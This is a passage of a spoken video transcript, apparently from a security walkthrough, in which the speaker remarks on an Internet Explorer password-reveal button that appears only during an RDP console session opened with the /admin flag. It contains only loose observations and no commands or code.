this button now. So I can see it typing. It probably got screwed up because I was clicking when it started typing, but I'm going to take that admin flag off real quick. And then I'm going to see if that button exists. It doesn't. So the /admin, that gives you a console session. And I didn't really think it did anything nowadays, but obviously Internet Explorer behaves a little bit differently when you add that. So today I learned. Or we don't have it now. What? So if I refresh the page, did I have it because like the page loaded when I was RDP'd? Like I'm getting even more confused now. Okay. So I have it that way. So I'm going to exit this. Let's get rid of admin. Okay, so I guess you just have to have the session open when the input goes over to the password. Yeah, so the input box has to be empty, and then you have to have be remoted in at that time. Because I see it now. I'm going to close out, and then we'll open it again, and I'm guessing I won't be able to see it. Yep, can't see it. So that's pretty cool. It's a weird behavior. I don't even know how that's working under the hood, but it is. If you, I guess, remote desktop long enough, you would eventually see it type the password, or there's probably some JavaScript you can do to just unmask it yourself. So with that being said, take care all, and I will see you all next time.